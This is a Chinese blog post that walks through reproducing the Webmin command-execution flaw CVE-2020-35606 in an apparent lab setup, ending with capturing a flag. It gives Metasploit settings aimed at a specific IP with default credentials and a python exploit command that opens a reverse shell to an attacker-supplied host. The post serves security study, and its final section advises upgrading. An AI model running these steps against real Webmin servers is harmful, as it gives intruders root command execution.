Webmin 命令执行漏洞 (CVE-2020-35606)


所有文章,仅供安全研究与学习之用,后果自负!

Webmin 命令执行漏洞 (CVE-2020-35606)

0x01 漏洞描述

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password

CVE-2020-35606使用的还是CVE-2019-12840的执行脚本,换了新的载体,利用方式还是一样的

https://ip:port/session_login.cgi

0x02 影响范围

Webmin 1.962版本及之前版本

0x03 漏洞复现

使用msf复现

脚本地址

https://github.com/puckiestyle/CVE-2020-35606

在这里插入图片描述
下载下导入msf后 relod_all 失败 后来将文件名改为

webmin_pu_escape_bypass_rce.rb

重启msfconsole 导入成功 不知道是不是文件名原因
导入msf方法

使用脚本

search webmin
use 6
info   查看脚本信息
set rhosts 118.193.36.37
set rport 9720(一般是10000)
set ssl true  (开启ssl就设为true)
set username root      # 运行时提示 要账号密码 就又加上
set password password  
check  #检查是否存在漏洞

在这里插入图片描述
漏洞存在
在这里插入图片描述

反弹shell 的话

在之前基础上 
set lhost vps的ip
run

不知道为什么创建会话失败
在这里插入图片描述

利用脚本 成功

webmin_cve-2019-12840_poc
脚本地址

https://github.com/KrE80r/webmin_cve-2019-12840_poc

python3运行

使用前注意修改 py文件中的 121行的端口号

反弹shell

python CVE-2019-12840.py -u https://vulfocus.fofa.so -U root -P password -lhost x.x.x.x -lport 9897

在这里插入图片描述
脚本反弹shell成功
flag获取
在这里插入图片描述

0x04 漏洞修复

升级到最新版本

Guess you like

Origin blog.csdn.net/YouthBelief/article/details/121264240